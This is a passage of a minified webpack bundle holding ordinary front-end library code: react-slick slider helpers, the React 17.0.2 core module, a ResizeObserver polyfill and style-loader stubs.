t,l=a.default.Children.count(e.children),o=e.listRef,i=Math.ceil(y(o)),r=e.trackRef&&e.trackRef.node,s=Math.ceil(y(r));if(e.vertical)t=i;else{var p=e.centerMode&&2*parseInt(e.centerPadding);"string"==typeof e.centerPadding&&"%"===e.centerPadding.slice(-1)&&(p*=i/100),t=Math.ceil((i-p)/e.slidesToShow)}var u=o&&b(o.querySelector('[data-index="0"]')),d=u*e.slidesToShow,m=void 0===e.currentSlide?e.initialSlide:e.currentSlide;e.rtl&&void 0===e.currentSlide&&(m=l-1-e.initialSlide);var g=e.lazyLoadedList||[],v=c(n(n({},e),{},{currentSlide:m,lazyLoadedList:g})),h={slideCount:l,slideWidth:t,listWidth:i,trackWidth:s,currentSlide:m,slideHeight:u,listHeight:d,lazyLoadedList:g=g.concat(v)};return null===e.autoplaying&&e.autoplay&&(h.autoplaying="playing"),h},t.slideHandler=function(e){var t=e.waitForAnimate,l=e.animating,o=e.fade,a=e.infinite,i=e.index,r=e.slideCount,p=e.lazyLoad,u=e.currentSlide,d=e.centerMode,m=e.slidesToScroll,g=e.slidesToShow,y=e.useCSS,b=e.lazyLoadedList;if(t&&l)return{};var v,f,k,w=i,x={},E={},S=a?i:s(i,0,r-1);if(o){if(!a&&(i<0||i>=r))return{};i<0?w=i+r:i>=r&&(w=i-r),p&&b.indexOf(w)<0&&(b=b.concat(w)),x={animating:!0,currentSlide:w,lazyLoadedList:b,targetSlide:w},E={animating:!1,targetSlide:w}}else v=w,w<0?(v=w+r,a?r%m!=0&&(v=r-r%m):v=0):!h(e)&&w>u?w=v=u:d&&w>=r?(w=a?r:r-1,v=a?0:r-1):w>=r&&(v=w-r,a?r%m!=0&&(v=0):v=r-g),!a&&w+g>=r&&(v=r-g),f=C(n(n({},e),{},{slideIndex:w})),k=C(n(n({},e),{},{slideIndex:v})),a||(f===k&&(w=v),f=k),p&&(b=b.concat(c(n(n({},e),{},{currentSlide:w})))),y?(x={animating:!0,currentSlide:v,trackStyle:_(n(n({},e),{},{left:f})),lazyLoadedList:b,targetSlide:S},E={animating:!1,currentSlide:v,trackStyle:T(n(n({},e),{},{left:k})),swipeLeft:null,targetSlide:S}):x={currentSlide:v,trackStyle:T(n(n({},e),{},{left:k})),lazyLoadedList:b,targetSlide:S};return{state:x,nextState:E}},t.changeSlide=function(e,t){var l,o,a,i,r=e.slidesToScroll,s=e.slidesToShow,p=e.slideCount,c=e.currentSlide,u=e.targetSlide,d=e.lazyLoad,m=e.infinite;if(l=p%r!=0?0:(p-c)%r,"previous"===t.message)i=c-(a=0===l?r:s-l),d&&!m&&(i=-1==(o=c-a)?p-1:o),m||(i=u-r);else if("next"===t.message)i=c+(a=0===l?r:l),d&&!m&&(i=(c+r)%p+l),m||(i=u+r);else if("dots"===t.message)i=t.index*t.slidesToScroll;else if("children"===t.message){if(i=t.index,m){var g=L(n(n({},e),{},{targetSlide:i}));i>t.currentSlide&&"left"===g?i-=p:i<t.currentSlide&&"right"===g&&(i+=p)}}else"index"===t.message&&(i=Number(t.index));return i},t.keyHandler=function(e,t,l){return e.target.tagName.match("TEXTAREA|INPUT|SELECT")||!t?"":37===e.keyCode?l?"next":"previous":39===e.keyCode?l?"previous":"next":""},t.swipeStart=function(e,t,l){return"IMG"===e.target.tagName&&p(e),!t||!l&&-1!==e.type.indexOf("mouse")?"":{dragging:!0,touchObject:{startX:e.touches?e.touches[0].pageX:e.clientX,startY:e.touches?e.touches[0].pageY:e.clientY,curX:e.touches?e.touches[0].pageX:e.clientX,curY:e.touches?e.touches[0].pageY:e.clientY}}},t.swipeMove=function(e,t){var l=t.scrolling,o=t.animating,a=t.vertical,i=t.swipeToSlide,r=t.verticalSwiping,s=t.rtl,c=t.currentSlide,u=t.edgeFriction,d=t.edgeDragged,m=t.onEdge,g=t.swiped,y=t.swiping,b=t.slideCount,f=t.slidesToScroll,k=t.infinite,w=t.touchObject,x=t.swipeEvent,_=t.listHeight,E=t.listWidth;if(!l){if(o)return p(e);a&&i&&r&&p(e);var S,P={},L=C(t);w.curX=e.touches?e.touches[0].pageX:e.clientX,w.curY=e.touches?e.touches[0].pageY:e.clientY,w.swipeLength=Math.round(Math.sqrt(Math.pow(w.curX-w.startX,2)));var I=Math.round(Math.sqrt(Math.pow(w.curY-w.startY,2)));if(!r&&!y&&I>10)return{scrolling:!0};r&&(w.swipeLength=I);var B=(s?-1:1)*(w.curX>w.startX?1:-1);r&&(B=w.curY>w.startY?1:-1);var U=Math.ceil(b/f),M=v(t.touchObject,r),A=w.swipeLength;return k||(0===c&&("right"===M||"down"===M)||c+1>=U&&("left"===M||"up"===M)||!h(t)&&("left"===M||"up"===M))&&(A=w.swipeLength*u,!1===d&&m&&(m(M),P.edgeDragged=!0)),!g&&x&&(x(M),P.swiped=!0),S=a?L+A*(_/E)*B:s?L-A*B:L+A*B,r&&(S=L+A*B),P=n(n({},P),{},{touchObject:w,swipeLeft:S,trackStyle:T(n(n({},t),{},{left:S}))}),Math.abs(w.curX-w.startX)<.8*Math.abs(w.curY-w.startY)||w.swipeLength>10&&(P.swiping=!0,p(e)),P}},t.swipeEnd=function(e,t){var l=t.dragging,o=t.swipe,a=t.touchObject,i=t.listWidth,r=t.touchThreshold,s=t.verticalSwiping,c=t.listHeight,u=t.swipeToSlide,d=t.scrolling,m=t.onSwipe,g=t.targetSlide,y=t.currentSlide,b=t.infinite;if(!l)return o&&p(e),{};var h=s?c/r:i/r,f=v(a,s),x={dragging:!1,edgeDragged:!1,scrolling:!1,swiping:!1,swiped:!1,swipeLeft:null,touchObject:{}};if(d)return x;if(!a.swipeLength)return x;if(a.swipeLength>h){var T,E;p(e),m&&m(f);var S=b?y:g;switch(f){case"left":case"up":E=S+w(t),T=u?k(t,E):E,x.currentDirection=0;break;case"right":case"down":E=S-w(t),T=u?k(t,E):E,x.currentDirection=1;break;default:T=S}x.triggerSlideHandler=T}else{var P=C(t);x.trackStyle=_(n(n({},t),{},{left:P}))}return x};var f=function(e){for(var t=e.infinite?2*e.slideCount:e.slideCount,l=e.infinite?-1*e.slidesToShow:0,o=e.infinite?-1*e.slidesToShow:0,a=[];l<t;)a.push(l),l=o+e.slidesToScroll,o+=Math.min(e.slidesToScroll,e.slidesToShow);return a};t.getNavigableIndexes=f;var k=function(e,t){var l=f(e),o=0;if(t>l[l.length-1])t=l[l.length-1];else for(var a in l){if(t<l[a]){t=o;break}o=l[a]}return t};t.checkNavigable=k;var w=function(e){var t=e.centerMode?e.slideWidth*Math.floor(e.slidesToShow/2):0;if(e.swipeToSlide){var l,o=e.listRef,a=o.querySelectorAll&&o.querySelectorAll(".slick-slide")||[];if(Array.from(a).every((function(o){if(e.vertical){if(o.offsetTop+b(o)/2>-1*e.swipeLeft)return l=o,!1}else if(o.offsetLeft-t+y(o)/2>-1*e.swipeLeft)return l=o,!1;return!0})),!l)return 0;var i=!0===e.rtl?e.slideCount-e.currentSlide:e.currentSlide;return Math.abs(l.dataset.index-i)||1}return e.slidesToScroll};t.getSlideCount=w;var x=function(e,t){return t.reduce((function(t,l){return t&&e.hasOwnProperty(l)}),!0)?null:console.error("Keys Missing:",e)};t.checkSpecKeys=x;var T=function(e){var t,l;x(e,["left","variableWidth","slideCount","slidesToShow","slideWidth"]);var o=e.slideCount+2*e.slidesToShow;e.vertical?l=o*e.slideHeight:t=P(e)*e.slideWidth;var a={opacity:1,transition:"",WebkitTransition:""};if(e.useTransform){var i=e.vertical?"translate3d(0px, "+e.left+"px, 0px)":"translate3d("+e.left+"px, 0px, 0px)",r=e.vertical?"translate3d(0px, "+e.left+"px, 0px)":"translate3d("+e.left+"px, 0px, 0px)",s=e.vertical?"translateY("+e.left+"px)":"translateX("+e.left+"px)";a=n(n({},a),{},{WebkitTransform:i,transform:r,msTransform:s})}else e.vertical?a.top=e.left:a.left=e.left;return e.fade&&(a={opacity:1}),t&&(a.width=t),l&&(a.height=l),window&&!window.addEventListener&&window.attachEvent&&(e.vertical?a.marginTop=e.left+"px":a.marginLeft=e.left+"px"),a};t.getTrackCSS=T;var _=function(e){x(e,["left","variableWidth","slideCount","slidesToShow","slideWidth","speed","cssEase"]);var t=T(e);return e.useTransform?(t.WebkitTransition="-webkit-transform "+e.speed+"ms "+e.cssEase,t.transition="transform "+e.speed+"ms "+e.cssEase):e.vertical?t.transition="top "+e.speed+"ms "+e.cssEase:t.transition="left "+e.speed+"ms "+e.cssEase,t};t.getTrackAnimateCSS=_;var C=function(e){if(e.unslick)return 0;x(e,["slideIndex","trackRef","infinite","centerMode","slideCount","slidesToShow","slidesToScroll","slideWidth","listWidth","variableWidth","slideHeight"]);var t,l,o=e.slideIndex,a=e.trackRef,i=e.infinite,n=e.centerMode,r=e.slideCount,s=e.slidesToShow,p=e.slidesToScroll,c=e.slideWidth,u=e.listWidth,d=e.variableWidth,m=e.slideHeight,g=e.fade,y=e.vertical;if(g||1===e.slideCount)return 0;var b=0;if(i?(b=-E(e),r%p!=0&&o+p>r&&(b=-(o>r?s-(o-r):r%p)),n&&(b+=parseInt(s/2))):(r%p!=0&&o+p>r&&(b=s-r%p),n&&(b=parseInt(s/2))),t=y?o*m*-1+b*m:o*c*-1+b*c,!0===d){var v,h=a&&a.node;if(v=o+E(e),t=(l=h&&h.childNodes[v])?-1*l.offsetLeft:0,!0===n){v=i?o+E(e):o,l=h&&h.children[v],t=0;for(var f=0;f<v;f++)t-=h&&h.children[f]&&h.children[f].offsetWidth;t-=parseInt(e.centerPadding),t+=l&&(u-l.offsetWidth)/2}}return t};t.getTrackLeft=C;var E=function(e){return e.unslick||!e.infinite?0:e.variableWidth?e.slideCount:e.slidesToShow+(e.centerMode?1:0)};t.getPreClones=E;var S=function(e){return e.unslick||!e.infinite?0:e.slideCount};t.getPostClones=S;var P=function(e){return 1===e.slideCount?1:E(e)+e.slideCount+S(e)};t.getTotalSlides=P;var L=function(e){return e.targetSlide>e.currentSlide?e.targetSlide>e.currentSlide+I(e)?"left":"right":e.targetSlide<e.currentSlide-B(e)?"right":"left"};t.siblingDirection=L;var I=function(e){var t=e.slidesToShow,l=e.centerMode,o=e.rtl,a=e.centerPadding;if(l){var i=(t-1)/2+1;return parseInt(a)>0&&(i+=1),o&&t%2==0&&(i+=1),i}return o?0:t-1};t.slidesOnRight=I;var B=function(e){var t=e.slidesToShow,l=e.centerMode,o=e.rtl,a=e.centerPadding;if(l){var i=(t-1)/2+1;return parseInt(a)>0&&(i+=1),o||t%2!=0||(i+=1),i}return o?t-1:0};t.slidesOnLeft=B,t.canUseDOM=function(){return!("undefined"==typeof window||!window.document||!window.document.createElement)}},72408:(e,t,l)=>{"use strict";var o=l(27418),a=60103,i=60106;t.Fragment=60107,t.StrictMode=60108,t.Profiler=60114;var n=60109,r=60110,s=60112;t.Suspense=60113;var p=60115,c=60116;if("function"==typeof Symbol&&Symbol.for){var u=Symbol.for;a=u("react.element"),i=u("react.portal"),t.Fragment=u("react.fragment"),t.StrictMode=u("react.strict_mode"),t.Profiler=u("react.profiler"),n=u("react.provider"),r=u("react.context"),s=u("react.forward_ref"),t.Suspense=u("react.suspense"),p=u("react.memo"),c=u("react.lazy")}var d="function"==typeof Symbol&&Symbol.iterator;function m(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,l=1;l<arguments.length;l++)t+="&args[]="+encodeURIComponent(arguments[l]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var g={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},y={};function b(e,t,l){this.props=e,this.context=t,this.refs=y,this.updater=l||g}function v(){}function h(e,t,l){this.props=e,this.context=t,this.refs=y,this.updater=l||g}b.prototype.isReactComponent={},b.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(m(85));this.updater.enqueueSetState(this,e,t,"setState")},b.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},v.prototype=b.prototype;var f=h.prototype=new v;f.constructor=h,o(f,b.prototype),f.isPureReactComponent=!0;var k={current:null},w=Object.prototype.hasOwnProperty,x={key:!0,ref:!0,__self:!0,__source:!0};function T(e,t,l){var o,i={},n=null,r=null;if(null!=t)for(o in void 0!==t.ref&&(r=t.ref),void 0!==t.key&&(n=""+t.key),t)w.call(t,o)&&!x.hasOwnProperty(o)&&(i[o]=t[o]);var s=arguments.length-2;if(1===s)i.children=l;else if(1<s){for(var p=Array(s),c=0;c<s;c++)p[c]=arguments[c+2];i.children=p}if(e&&e.defaultProps)for(o in s=e.defaultProps)void 0===i[o]&&(i[o]=s[o]);return{$$typeof:a,type:e,key:n,ref:r,props:i,_owner:k.current}}function _(e){return"object"==typeof e&&null!==e&&e.$$typeof===a}var C=/\/+/g;function E(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+e.replace(/[=:]/g,(function(e){return t[e]}))}(""+e.key):t.toString(36)}function S(e,t,l,o,n){var r=typeof e;"undefined"!==r&&"boolean"!==r||(e=null);var s=!1;if(null===e)s=!0;else switch(r){case"string":case"number":s=!0;break;case"object":switch(e.$$typeof){case a:case i:s=!0}}if(s)return n=n(s=e),e=""===o?"."+E(s,0):o,Array.isArray(n)?(l="",null!=e&&(l=e.replace(C,"$&/")+"/"),S(n,t,l,"",(function(e){return e}))):null!=n&&(_(n)&&(n=function(e,t){return{$$typeof:a,type:e.type,key:t,ref:e.ref,props:e.props,_owner:e._owner}}(n,l+(!n.key||s&&s.key===n.key?"":(""+n.key).replace(C,"$&/")+"/")+e)),t.push(n)),1;if(s=0,o=""===o?".":o+":",Array.isArray(e))for(var p=0;p<e.length;p++){var c=o+E(r=e[p],p);s+=S(r,t,l,c,n)}else if(c=function(e){return null===e||"object"!=typeof e?null:"function"==typeof(e=d&&e[d]||e["@@iterator"])?e:null}(e),"function"==typeof c)for(e=c.call(e),p=0;!(r=e.next()).done;)s+=S(r=r.value,t,l,c=o+E(r,p++),n);else if("object"===r)throw t=""+e,Error(m(31,"[object Object]"===t?"object with keys {"+Object.keys(e).join(", ")+"}":t));return s}function P(e,t,l){if(null==e)return e;var o=[],a=0;return S(e,o,"","",(function(e){return t.call(l,e,a++)})),o}function L(e){if(-1===e._status){var t=e._result;t=t(),e._status=0,e._result=t,t.then((function(t){0===e._status&&(t=t.default,e._status=1,e._result=t)}),(function(t){0===e._status&&(e._status=2,e._result=t)}))}if(1===e._status)return e._result;throw e._result}var I={current:null};function B(){var e=I.current;if(null===e)throw Error(m(321));return e}var U={ReactCurrentDispatcher:I,ReactCurrentBatchConfig:{transition:0},ReactCurrentOwner:k,IsSomeRendererActing:{current:!1},assign:o};t.Children={map:P,forEach:function(e,t,l){P(e,(function(){t.apply(this,arguments)}),l)},count:function(e){var t=0;return P(e,(function(){t++})),t},toArray:function(e){return P(e,(function(e){return e}))||[]},only:function(e){if(!_(e))throw Error(m(143));return e}},t.Component=b,t.PureComponent=h,t.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=U,t.cloneElement=function(e,t,l){if(null==e)throw Error(m(267,e));var i=o({},e.props),n=e.key,r=e.ref,s=e._owner;if(null!=t){if(void 0!==t.ref&&(r=t.ref,s=k.current),void 0!==t.key&&(n=""+t.key),e.type&&e.type.defaultProps)var p=e.type.defaultProps;for(c in t)w.call(t,c)&&!x.hasOwnProperty(c)&&(i[c]=void 0===t[c]&&void 0!==p?p[c]:t[c])}var c=arguments.length-2;if(1===c)i.children=l;else if(1<c){p=Array(c);for(var u=0;u<c;u++)p[u]=arguments[u+2];i.children=p}return{$$typeof:a,type:e.type,key:n,ref:r,props:i,_owner:s}},t.createContext=function(e,t){return void 0===t&&(t=null),(e={$$typeof:r,_calculateChangedBits:t,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:n,_context:e},e.Consumer=e},t.createElement=T,t.createFactory=function(e){var t=T.bind(null,e);return t.type=e,t},t.createRef=function(){return{current:null}},t.forwardRef=function(e){return{$$typeof:s,render:e}},t.isValidElement=_,t.lazy=function(e){return{$$typeof:c,_payload:{_status:-1,_result:e},_init:L}},t.memo=function(e,t){return{$$typeof:p,type:e,compare:void 0===t?null:t}},t.useCallback=function(e,t){return B().useCallback(e,t)},t.useContext=function(e,t){return B().useContext(e,t)},t.useDebugValue=function(){},t.useEffect=function(e,t){return B().useEffect(e,t)},t.useImperativeHandle=function(e,t,l){return B().useImperativeHandle(e,t,l)},t.useLayoutEffect=function(e,t){return B().useLayoutEffect(e,t)},t.useMemo=function(e,t){return B().useMemo(e,t)},t.useReducer=function(e,t,l){return B().useReducer(e,t,l)},t.useRef=function(e){return B().useRef(e)},t.useState=function(e){return B().useState(e)},t.version="17.0.2"},67294:(e,t,l)=>{"use strict";e.exports=l(72408)},91033:(e,t,l)=>{"use strict";l.r(t),l.d(t,{default:()=>T});var o=function(){if("undefined"!=typeof Map)return Map;function e(e,t){var l=-1;return e.some((function(e,o){return e[0]===t&&(l=o,!0)})),l}return function(){function t(){this.__entries__=[]}return Object.defineProperty(t.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),t.prototype.get=function(t){var l=e(this.__entries__,t),o=this.__entries__[l];return o&&o[1]},t.prototype.set=function(t,l){var o=e(this.__entries__,t);~o?this.__entries__[o][1]=l:this.__entries__.push([t,l])},t.prototype.delete=function(t){var l=this.__entries__,o=e(l,t);~o&&l.splice(o,1)},t.prototype.has=function(t){return!!~e(this.__entries__,t)},t.prototype.clear=function(){this.__entries__.splice(0)},t.prototype.forEach=function(e,t){void 0===t&&(t=null);for(var l=0,o=this.__entries__;l<o.length;l++){var a=o[l];e.call(t,a[1],a[0])}},t}()}(),a="undefined"!=typeof window&&"undefined"!=typeof document&&window.document===document,i=void 0!==l.g&&l.g.Math===Math?l.g:"undefined"!=typeof self&&self.Math===Math?self:"undefined"!=typeof window&&window.Math===Math?window:Function("return this")(),n="function"==typeof requestAnimationFrame?requestAnimationFrame.bind(i):function(e){return setTimeout((function(){return e(Date.now())}),1e3/60)},r=["top","right","bottom","left","width","height","size","weight"],s="undefined"!=typeof MutationObserver,p=function(){function e(){this.connected_=!1,this.mutationEventsAdded_=!1,this.mutationsObserver_=null,this.observers_=[],this.onTransitionEnd_=this.onTransitionEnd_.bind(this),this.refresh=function(e,t){var l=!1,o=!1,a=0;function i(){l&&(l=!1,e()),o&&s()}function r(){n(i)}function s(){var e=Date.now();if(l){if(e-a<2)return;o=!0}else l=!0,o=!1,setTimeout(r,t);a=e}return s}(this.refresh.bind(this),20)}return e.prototype.addObserver=function(e){~this.observers_.indexOf(e)||this.observers_.push(e),this.connected_||this.connect_()},e.prototype.removeObserver=function(e){var t=this.observers_,l=t.indexOf(e);~l&&t.splice(l,1),!t.length&&this.connected_&&this.disconnect_()},e.prototype.refresh=function(){this.updateObservers_()&&this.refresh()},e.prototype.updateObservers_=function(){var e=this.observers_.filter((function(e){return e.gatherActive(),e.hasActive()}));return e.forEach((function(e){return e.broadcastActive()})),e.length>0},e.prototype.connect_=function(){a&&!this.connected_&&(document.addEventListener("transitionend",this.onTransitionEnd_),window.addEventListener("resize",this.refresh),s?(this.mutationsObserver_=new MutationObserver(this.refresh),this.mutationsObserver_.observe(document,{attributes:!0,childList:!0,characterData:!0,subtree:!0})):(document.addEventListener("DOMSubtreeModified",this.refresh),this.mutationEventsAdded_=!0),this.connected_=!0)},e.prototype.disconnect_=function(){a&&this.connected_&&(document.removeEventListener("transitionend",this.onTransitionEnd_),window.removeEventListener("resize",this.refresh),this.mutationsObserver_&&this.mutationsObserver_.disconnect(),this.mutationEventsAdded_&&document.removeEventListener("DOMSubtreeModified",this.refresh),this.mutationsObserver_=null,this.mutationEventsAdded_=!1,this.connected_=!1)},e.prototype.onTransitionEnd_=function(e){var t=e.propertyName,l=void 0===t?"":t;r.some((function(e){return!!~l.indexOf(e)}))&&this.refresh()},e.getInstance=function(){return this.instance_||(this.instance_=new e),this.instance_},e.instance_=null,e}(),c=function(e,t){for(var l=0,o=Object.keys(t);l<o.length;l++){var a=o[l];Object.defineProperty(e,a,{value:t[a],enumerable:!1,writable:!1,configurable:!0})}return e},u=function(e){return e&&e.ownerDocument&&e.ownerDocument.defaultView||i},d=v(0,0,0,0);function m(e){return parseFloat(e)||0}function g(e){for(var t=[],l=1;l<arguments.length;l++)t[l-1]=arguments[l];return t.reduce((function(t,l){return t+m(e["border-"+l+"-width"])}),0)}var y="undefined"!=typeof SVGGraphicsElement?function(e){return e instanceof u(e).SVGGraphicsElement}:function(e){return e instanceof u(e).SVGElement&&"function"==typeof e.getBBox};function b(e){return a?y(e)?function(e){var t=e.getBBox();return v(0,0,t.width,t.height)}(e):function(e){var t=e.clientWidth,l=e.clientHeight;if(!t&&!l)return d;var o=u(e).getComputedStyle(e),a=function(e){for(var t={},l=0,o=["top","right","bottom","left"];l<o.length;l++){var a=o[l],i=e["padding-"+a];t[a]=m(i)}return t}(o),i=a.left+a.right,n=a.top+a.bottom,r=m(o.width),s=m(o.height);if("border-box"===o.boxSizing&&(Math.round(r+i)!==t&&(r-=g(o,"left","right")+i),Math.round(s+n)!==l&&(s-=g(o,"top","bottom")+n)),!function(e){return e===u(e).document.documentElement}(e)){var p=Math.round(r+i)-t,c=Math.round(s+n)-l;1!==Math.abs(p)&&(r-=p),1!==Math.abs(c)&&(s-=c)}return v(a.left,a.top,r,s)}(e):d}function v(e,t,l,o){return{x:e,y:t,width:l,height:o}}var h=function(){function e(e){this.broadcastWidth=0,this.broadcastHeight=0,this.contentRect_=v(0,0,0,0),this.target=e}return e.prototype.isActive=function(){var e=b(this.target);return this.contentRect_=e,e.width!==this.broadcastWidth||e.height!==this.broadcastHeight},e.prototype.broadcastRect=function(){var e=this.contentRect_;return this.broadcastWidth=e.width,this.broadcastHeight=e.height,e},e}(),f=function(e,t){var l,o,a,i,n,r,s,p=(o=(l=t).x,a=l.y,i=l.width,n=l.height,r="undefined"!=typeof DOMRectReadOnly?DOMRectReadOnly:Object,s=Object.create(r.prototype),c(s,{x:o,y:a,width:i,height:n,top:a,right:o+i,bottom:n+a,left:o}),s);c(this,{target:e,contentRect:p})},k=function(){function e(e,t,l){if(this.activeObservations_=[],this.observations_=new o,"function"!=typeof e)throw new TypeError("The callback provided as parameter 1 is not a function.");this.callback_=e,this.controller_=t,this.callbackCtx_=l}return e.prototype.observe=function(e){if(!arguments.length)throw new TypeError("1 argument required, but only 0 present.");if("undefined"!=typeof Element&&Element instanceof Object){if(!(e instanceof u(e).Element))throw new TypeError('parameter 1 is not of type "Element".');var t=this.observations_;t.has(e)||(t.set(e,new h(e)),this.controller_.addObserver(this),this.controller_.refresh())}},e.prototype.unobserve=function(e){if(!arguments.length)throw new TypeError("1 argument required, but only 0 present.");if("undefined"!=typeof Element&&Element instanceof Object){if(!(e instanceof u(e).Element))throw new TypeError('parameter 1 is not of type "Element".');var t=this.observations_;t.has(e)&&(t.delete(e),t.size||this.controller_.removeObserver(this))}},e.prototype.disconnect=function(){this.clearActive(),this.observations_.clear(),this.controller_.removeObserver(this)},e.prototype.gatherActive=function(){var e=this;this.clearActive(),this.observations_.forEach((function(t){t.isActive()&&e.activeObservations_.push(t)}))},e.prototype.broadcastActive=function(){if(this.hasActive()){var e=this.callbackCtx_,t=this.activeObservations_.map((function(e){return new f(e.target,e.broadcastRect())}));this.callback_.call(e,t,e),this.clearActive()}},e.prototype.clearActive=function(){this.activeObservations_.splice(0)},e.prototype.hasActive=function(){return this.activeObservations_.length>0},e}(),w="undefined"!=typeof WeakMap?new WeakMap:new o,x=function e(t){if(!(this instanceof e))throw new TypeError("Cannot call a class as a function.");if(!arguments.length)throw new TypeError("1 argument required, but only 0 present.");var l=p.getInstance(),o=new k(t,l,this);w.set(this,o)};["observe","unobserve","disconnect"].forEach((function(e){x.prototype[e]=function(){var t;return(t=w.get(this))[e].apply(t,arguments)}}));const T=void 0!==i.ResizeObserver?i.ResizeObserver:x},71169:e=>{e.exports=function(e){return e.replace(/[A-Z]/g,(function(e){return"-"+e.toLowerCase()})).toLowerCase()}},16672:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(38902),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},42413:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(30439),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},40619:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(11211),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},74424:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(31022),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},43958:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(70398),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},93332:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(33099),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},66584:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(14437),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},98906:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(97921),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},48515:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(10912),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},46764:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(4),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},19552:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(99243),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},78963:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(84586),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},65907:(e,t,l)=>{"use strict";var 